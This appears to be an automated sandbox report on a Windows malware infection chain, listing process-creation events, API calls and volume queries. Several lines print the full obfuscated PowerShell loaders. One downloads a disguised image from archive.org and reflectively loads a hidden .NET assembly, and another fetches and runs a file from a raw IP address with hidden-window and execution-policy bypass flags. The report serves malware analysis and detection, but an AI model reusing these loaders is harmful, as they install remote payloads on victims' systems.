                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezf9aw1hz2vvcmwnkycgpsankyd7mh1odhrwczovl2lhnjawmtaylnvzlmfyy2hpdmuub3jnlzmyl2l0zw1zl2rldgfolw5vdgutdl8ymdi0mtavrgv0ywhob3qnkydlx1yuanbnihswftt7mx13zwjdjysnbgllbnqgpsbojysnzxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50o3sxfwltjysnywdlqnl0zxmgpsb7mx13zwjdbgllbnqnkycurg93bmxvywreyxrhkhsxfwltywdlvscrj3jsktt7mx1pbwfnzvrlehqgpsbbu3lzdgvtllqnkydlehqujysnrw5jb2rpbmddojpvvey4lkdldfn0cmluzyh7mx1pbwfnzuj5dgvzktt7jysnmx1zdgfydezsywcgpsb7mh08jysnpejbu0u2nf9tvefsvd4+ezb9jysno3sxfwvuzezsywcgpsb7mh08pejbu0u2nf9ftkq+pnswftt7mx1zdgfydeluzgv4id0gezf9aw1hz2vuzxh0lkluzgv4t2yoezf9c3rhcnrgbgfnktt7mx1lbmrjbmrleca9ihsxfwltywdlvgv4dc4nkydjbmrlee9mkhsxfwvuzezsywcpo3sxfxn0yxj0sw5kzxggjysnlwdlidaglwfuzcb7mx0nkydlbmrjbmrlecatz3qgezf9c3rhcnrjbmrledt7mx1zdgfydeluzgv4ics9ihsxfxn0yxj0rmxhzy5mzw5ndgg7eycrjzf9ymenkydzzty0tgvuz3roid0gezenkyd9zw5ksw5kzxgglsb7mx1zdgfydeluzgv4o3sxfwjhc2u2nenvbw1hbmqgpsb7mx1pbwfnzvrlehquu3vic3ryaw5nkhsxfxn0yxj0sw5kzxgsihsxfwjhc2u2nexlbmd0ack7ezf9y29tbwfuzej5dgvziccrjz0gw1n5cycrj3rlbs5db252zxj0xto6rnjvjysnbujhc2u2nfmnkyd0cmluzyh7mx1iyxnlnjrdb21tyw5kktt7mx1sb2fkzwrbc3nlbwjsesa9ifttexn0zw0nkycuumvmbgvjdglvbi5bc3nlbwjsjysnev06okxvywqoezf9y29tbwfuzej5dgvzktt7mx12ywlnzxrob2qgpsbbzg5sjysnawiusu8usg9tzv0ur2v0twv0ag9kkhswfvzbsxswfsk7ezf9dmfptwv0ag9klkknkydudm9rzsh7mx1udwxslcbakhswfxr4dc5ir0ddulivmdmzlza0ljaymi4zlji5ms8vjysnonb0dgh7mh0sihswfwrlc2f0axzhzg97mh0sihswfwrlc2f0axzhzg97mh0siccrj3swfwrlcycrj2f0axzhzg97mh0sihswfvjlz0fzbxswfswgezb9zgvzyxrpdmfkb3snkycwfswgezb9zgvzyxrpdmfkb3swfskpoycpicatribbq2hhcl0zosxbq2hhcl0znil8igludm9rzs1lehbyzxntsw9u';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{1}imageurl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/detahnot'+'e_v.jpg {0};{1}webc'+'lient = n'+'ew-object system.net.webclient;{1}im'+'agebytes = {1}webclient'+'.downloaddata({1}imageu'+'rl);{1}imagetext = [system.t'+'ext.'+'encoding]::utf8.getstring({1}imagebytes);{'+'1}startflag = {0}<'+'<base64_start>>{0}'+';{1}endflag = {0}<<base64_end>>{0};{1}startindex = {1}imagetext.indexof({1}startflag);{1}endindex = {1}imagetext.'+'indexof({1}endflag);{1}startindex '+'-ge 0 -and {1}'+'endindex -gt {1}startindex;{1}startindex += {1}startflag.length;{'+'1}ba'+'se64length = {1'+'}endindex - {1}startindex;{1}base64command = {1}imagetext.substring({1}startindex, {1}base64length);{1}commandbytes '+'= [sys'+'tem.convert]::fro'+'mbase64s'+'tring({1}base64command);{1}loadedassembly = [system'+'.reflection.assembl'+'y]::load({1}commandbytes);{1}vaimethod = [dnl'+'ib.io.home].getmethod({0}vai{0});{1}vaimethod.i'+'nvoke({1}null, @({0}txt.hggcrr/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}regasm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -f [char]39,[char]36)| invoke-expression"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfvecfcyq0drm0rlicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfkzc1uevblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjfckrlrklosvrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagde1zbupnaixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbtrnlwtwhxlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigv6wevqaix1aw50icagicagicagicagicagicagicagicagicagicagicagwmvpegrab1zeleludfb0ciagicagicagicagicagicagicagicagicagicagicagig11bgnlzkjaktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaircigicagicagicagicagicagicagicagicagicagicagicattmftzxnqyunficagicagicagicagicagicagicagicagicagicagicagvghty0hvsukgicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjfvecfcyq0drm0rlojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjiwljqwlzmzmc92zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnrjriisiirltly6qvbqrefuqvx2zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnziuyismcwwktttvgfyvc1tbevfucgzktttdgfsdcagicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcdmvyewjlc3r0agluz3n3zxnoyxjlzgzvcm5ldy52ylmi'+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfvecfcyq0drm0rlicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfkzc1uevblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjfckrlrklosvrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagde1zbupnaixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbtrnlwtwhxlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigv6wevqaix1aw50icagicagicagicagicagicagicagicagicagicagicagwmvpegrab1zeleludfb0ciagicagicagicagicagicagicagicagicagicagicagig11bgnlzkjaktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaircigicagicagicagicagicagicagicagicagicagicagicattmftzxnqyunficagicagicagicagicagicagicagicagicagicagicagvghty0hvsukgicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjfvecfcyq0drm0rlojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjiwljqwlzmzmc92zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnrjriisiirltly6qvbqrefuqvx2zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnziuyismcwwktttvgfyvc1tbevfucgzktttdgfsdcagicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcdmvyewjlc3r0agluz3n3zxnoyxjlzgzvcm5ldy52ylmi'+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezf9aw1hz2vvcmwnkycgpsankyd7mh1odhrwczovl2lhnjawmtaylnvzlmfyy2hpdmuub3jnlzmyl2l0zw1zl2rldgfolw5vdgutdl8ymdi0mtavrgv0ywhob3qnkydlx1yuanbnihswftt7mx13zwjdjysnbgllbnqgpsbojysnzxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50o3sxfwltjysnywdlqnl0zxmgpsb7mx13zwjdbgllbnqnkycurg93bmxvywreyxrhkhsxfwltywdlvscrj3jsktt7mx1pbwfnzvrlehqgpsbbu3lzdgvtllqnkydlehqujysnrw5jb2rpbmddojpvvey4lkdldfn0cmluzyh7mx1pbwfnzuj5dgvzktt7jysnmx1zdgfydezsywcgpsb7mh08jysnpejbu0u2nf9tvefsvd4+ezb9jysno3sxfwvuzezsywcgpsb7mh08pejbu0u2nf9ftkq+pnswftt7mx1zdgfydeluzgv4id0gezf9aw1hz2vuzxh0lkluzgv4t2yoezf9c3rhcnrgbgfnktt7mx1lbmrjbmrleca9ihsxfwltywdlvgv4dc4nkydjbmrlee9mkhsxfwvuzezsywcpo3sxfxn0yxj0sw5kzxggjysnlwdlidaglwfuzcb7mx0nkydlbmrjbmrlecatz3qgezf9c3rhcnrjbmrledt7mx1zdgfydeluzgv4ics9ihsxfxn0yxj0rmxhzy5mzw5ndgg7eycrjzf9ymenkydzzty0tgvuz3roid0gezenkyd9zw5ksw5kzxgglsb7mx1zdgfydeluzgv4o3sxfwjhc2u2nenvbw1hbmqgpsb7mx1pbwfnzvrlehquu3vic3ryaw5nkhsxfxn0yxj0sw5kzxgsihsxfwjhc2u2nexlbmd0ack7ezf9y29tbwfuzej5dgvziccrjz0gw1n5cycrj3rlbs5db252zxj0xto6rnjvjysnbujhc2u2nfmnkyd0cmluzyh7mx1iyxnlnjrdb21tyw5kktt7mx1sb2fkzwrbc3nlbwjsesa9ifttexn0zw0nkycuumvmbgvjdglvbi5bc3nlbwjsjysnev06okxvywqoezf9y29tbwfuzej5dgvzktt7mx12ywlnzxrob2qgpsbbzg5sjysnawiusu8usg9tzv0ur2v0twv0ag9kkhswfvzbsxswfsk7ezf9dmfptwv0ag9klkknkydudm9rzsh7mx1udwxslcbakhswfxr4dc5ir0ddulivmdmzlza0ljaymi4zlji5ms8vjysnonb0dgh7mh0sihswfwrlc2f0axzhzg97mh0sihswfwrlc2f0axzhzg97mh0siccrj3swfwrlcycrj2f0axzhzg97mh0sihswfvjlz0fzbxswfswgezb9zgvzyxrpdmfkb3snkycwfswgezb9zgvzyxrpdmfkb3swfskpoycpicatribbq2hhcl0zosxbq2hhcl0znil8igludm9rzs1lehbyzxntsw9u';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{1}imageurl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/detahnot'+'e_v.jpg {0};{1}webc'+'lient = n'+'ew-object system.net.webclient;{1}im'+'agebytes = {1}webclient'+'.downloaddata({1}imageu'+'rl);{1}imagetext = [system.t'+'ext.'+'encoding]::utf8.getstring({1}imagebytes);{'+'1}startflag = {0}<'+'<base64_start>>{0}'+';{1}endflag = {0}<<base64_end>>{0};{1}startindex = {1}imagetext.indexof({1}startflag);{1}endindex = {1}imagetext.'+'indexof({1}endflag);{1}startindex '+'-ge 0 -and {1}'+'endindex -gt {1}startindex;{1}startindex += {1}startflag.length;{'+'1}ba'+'se64length = {1'+'}endindex - {1}startindex;{1}base64command = {1}imagetext.substring({1}startindex, {1}base64length);{1}commandbytes '+'= [sys'+'tem.convert]::fro'+'mbase64s'+'tring({1}base64command);{1}loadedassembly = [system'+'.reflection.assembl'+'y]::load({1}commandbytes);{1}vaimethod = [dnl'+'ib.io.home].getmethod({0}vai{0});{1}vaimethod.i'+'nvoke({1}null, @({0}txt.hggcrr/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}regasm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -f [char]39,[char]36)| invoke-expression"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfvecfcyq0drm0rlicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfkzc1uevblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjfckrlrklosvrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagde1zbupnaixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbtrnlwtwhxlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigv6wevqaix1aw50icagicagicagicagicagicagicagicagicagicagicagwmvpegrab1zeleludfb0ciagicagicagicagicagicagicagicagicagicagicagig11bgnlzkjaktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaircigicagicagicagicagicagicagicagicagicagicagicattmftzxnqyunficagicagicagicagicagicagicagicagicagicagicagvghty0hvsukgicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjfvecfcyq0drm0rlojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjiwljqwlzmzmc92zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnrjriisiirltly6qvbqrefuqvx2zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnziuyismcwwktttvgfyvc1tbevfucgzktttdgfsdcagicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcdmvyewjlc3r0agluz3n3zxnoyxjlzgzvcm5ldy52ylmi'+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfvecfcyq0drm0rlicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfkzc1uevblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjfckrlrklosvrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagde1zbupnaixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbtrnlwtwhxlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigv6wevqaix1aw50icagicagicagicagicagicagicagicagicagicagicagwmvpegrab1zeleludfb0ciagicagicagicagicagicagicagicagicagicagicagig11bgnlzkjaktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaircigicagicagicagicagicagicagicagicagicagicagicattmftzxnqyunficagicagicagicagicagicagicagicagicagicagicagvghty0hvsukgicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjfvecfcyq0drm0rlojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjiwljqwlzmzmc92zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnrjriisiirltly6qvbqrefuqvx2zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnziuyismcwwktttvgfyvc1tbevfucgzktttdgfsdcagicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcdmvyewjlc3r0agluz3n3zxnoyxjlzgzvcm5ldy52ylmi'+[char]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezf9aw1hz2vvcmwnkycgpsankyd7mh1odhrwczovl2lhnjawmtaylnvzlmfyy2hpdmuub3jnlzmyl2l0zw1zl2rldgfolw5vdgutdl8ymdi0mtavrgv0ywhob3qnkydlx1yuanbnihswftt7mx13zwjdjysnbgllbnqgpsbojysnzxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50o3sxfwltjysnywdlqnl0zxmgpsb7mx13zwjdbgllbnqnkycurg93bmxvywreyxrhkhsxfwltywdlvscrj3jsktt7mx1pbwfnzvrlehqgpsbbu3lzdgvtllqnkydlehqujysnrw5jb2rpbmddojpvvey4lkdldfn0cmluzyh7mx1pbwfnzuj5dgvzktt7jysnmx1zdgfydezsywcgpsb7mh08jysnpejbu0u2nf9tvefsvd4+ezb9jysno3sxfwvuzezsywcgpsb7mh08pejbu0u2nf9ftkq+pnswftt7mx1zdgfydeluzgv4id0gezf9aw1hz2vuzxh0lkluzgv4t2yoezf9c3rhcnrgbgfnktt7mx1lbmrjbmrleca9ihsxfwltywdlvgv4dc4nkydjbmrlee9mkhsxfwvuzezsywcpo3sxfxn0yxj0sw5kzxggjysnlwdlidaglwfuzcb7mx0nkydlbmrjbmrlecatz3qgezf9c3rhcnrjbmrledt7mx1zdgfydeluzgv4ics9ihsxfxn0yxj0rmxhzy5mzw5ndgg7eycrjzf9ymenkydzzty0tgvuz3roid0gezenkyd9zw5ksw5kzxgglsb7mx1zdgfydeluzgv4o3sxfwjhc2u2nenvbw1hbmqgpsb7mx1pbwfnzvrlehquu3vic3ryaw5nkhsxfxn0yxj0sw5kzxgsihsxfwjhc2u2nexlbmd0ack7ezf9y29tbwfuzej5dgvziccrjz0gw1n5cycrj3rlbs5db252zxj0xto6rnjvjysnbujhc2u2nfmnkyd0cmluzyh7mx1iyxnlnjrdb21tyw5kktt7mx1sb2fkzwrbc3nlbwjsesa9ifttexn0zw0nkycuumvmbgvjdglvbi5bc3nlbwjsjysnev06okxvywqoezf9y29tbwfuzej5dgvzktt7mx12ywlnzxrob2qgpsbbzg5sjysnawiusu8usg9tzv0ur2v0twv0ag9kkhswfvzbsxswfsk7ezf9dmfptwv0ag9klkknkydudm9rzsh7mx1udwxslcbakhswfxr4dc5ir0ddulivmdmzlza0ljaymi4zlji5ms8vjysnonb0dgh7mh0sihswfwrlc2f0axzhzg97mh0sihswfwrlc2f0axzhzg97mh0siccrj3swfwrlcycrj2f0axzhzg97mh0sihswfvjlz0fzbxswfswgezb9zgvzyxrpdmfkb3snkycwfswgezb9zgvzyxrpdmfkb3swfskpoycpicatribbq2hhcl0zosxbq2hhcl0znil8igludm9rzs1lehbyzxntsw9u';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{1}imageurl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/detahnot'+'e_v.jpg {0};{1}webc'+'lient = n'+'ew-object system.net.webclient;{1}im'+'agebytes = {1}webclient'+'.downloaddata({1}imageu'+'rl);{1}imagetext = [system.t'+'ext.'+'encoding]::utf8.getstring({1}imagebytes);{'+'1}startflag = {0}<'+'<base64_start>>{0}'+';{1}endflag = {0}<<base64_end>>{0};{1}startindex = {1}imagetext.indexof({1}startflag);{1}endindex = {1}imagetext.'+'indexof({1}endflag);{1}startindex '+'-ge 0 -and {1}'+'endindex -gt {1}startindex;{1}startindex += {1}startflag.length;{'+'1}ba'+'se64length = {1'+'}endindex - {1}startindex;{1}base64command = {1}imagetext.substring({1}startindex, {1}base64length);{1}commandbytes '+'= [sys'+'tem.convert]::fro'+'mbase64s'+'tring({1}base64command);{1}loadedassembly = [system'+'.reflection.assembl'+'y]::load({1}commandbytes);{1}vaimethod = [dnl'+'ib.io.home].getmethod({0}vai{0});{1}vaimethod.i'+'nvoke({1}null, @({0}txt.hggcrr/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}regasm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -f [char]39,[char]36)| invoke-expression"
                    Source: RegAsm.exe, 00000011.00000002.872488880.0000000000851000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerm~3R4
                    Source: RegAsm.exe, 00000011.00000002.872488880.0000000000851000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerChrome77 [Compatibility Mode]]|
                    Source: RegAsm.exe, 00000011.00000002.872848173.0000000000883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.872488880.0000000000851000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: RegAsm.exe, 00000011.00000002.872488880.0000000000851000.00000004.00000020.00020000.00000000.sdmp, logs.dat.17.drBinary or memory string: [Program Manager]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10002933 cpuid 17_2_10002933
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,30_2_0045201B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,30_2_004520B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,30_2_00452143
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,30_2_00452393
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,30_2_00448484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,30_2_004524BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,30_2_004525C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,30_2_00452690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,30_2_0044896D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,30_2_0040F90C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,30_2_00451D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,30_2_00451FD0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
